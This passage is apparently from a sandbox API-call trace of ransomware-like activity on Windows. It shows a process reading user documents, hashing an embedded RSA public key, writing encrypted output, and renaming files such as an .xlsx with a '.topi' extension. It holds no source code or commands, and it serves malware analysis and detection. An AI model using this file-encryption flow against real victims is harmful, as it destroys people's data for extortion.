out: hHeap=0x680000) returned 1 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9300 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92d0 | out: hHeap=0x680000) returned 1 [0095.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92b8 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92a0 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1698 | out: hHeap=0x680000) returned 1 [0095.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.015] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x18ef0, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x18ef0, lpOverlapped=0x0) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.015] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18ef5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.015] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.016] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.016] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.016] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.016] CloseHandle (hObject=0x6a8) returned 1 [0095.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.024] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HHDQ5hSW5Mh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hhdq5hsw5mh.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HHDQ5hSW5Mh.xlsx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hhdq5hsw5mh.xlsx.topi")) returned 1 [0095.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.025] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.025] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.026] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fc6350, ftCreationTime.dwHighDateTime=0x1d5583a, ftLastAccessTime.dwLowDateTime=0xb0fdec50, ftLastAccessTime.dwHighDateTime=0x1d59967, ftLastWriteTime.dwLowDateTime=0xb0fdec50, ftLastWriteTime.dwHighDateTime=0x1d59967, nFileSizeHigh=0x0, nFileSizeLow=0xd9d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J t2.docx", cAlternateFileName="JT2~1.DOC")) returned 1 [0095.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.026] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J t2.docx") returned=".docx" [0095.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J t2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j t2.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.026] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=55761) returned 1 [0095.026] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.029] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd9ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.029] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.030] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.030] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd9d1, lpOverlapped=0x0) returned 1 [0095.030] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.030] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.030] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.030] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.031] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.031] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.031] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.031] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.031] GetLastError () returned 0x0 [0095.031] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.031] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.031] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.031] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.032] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd9d0) returned 0x9a06a00 [0095.032] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1698 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92a0 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f16e0 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92b8 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.032] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9300 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d92e8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.033] GetCurrentThreadId () returned 0x8c4 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5770 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 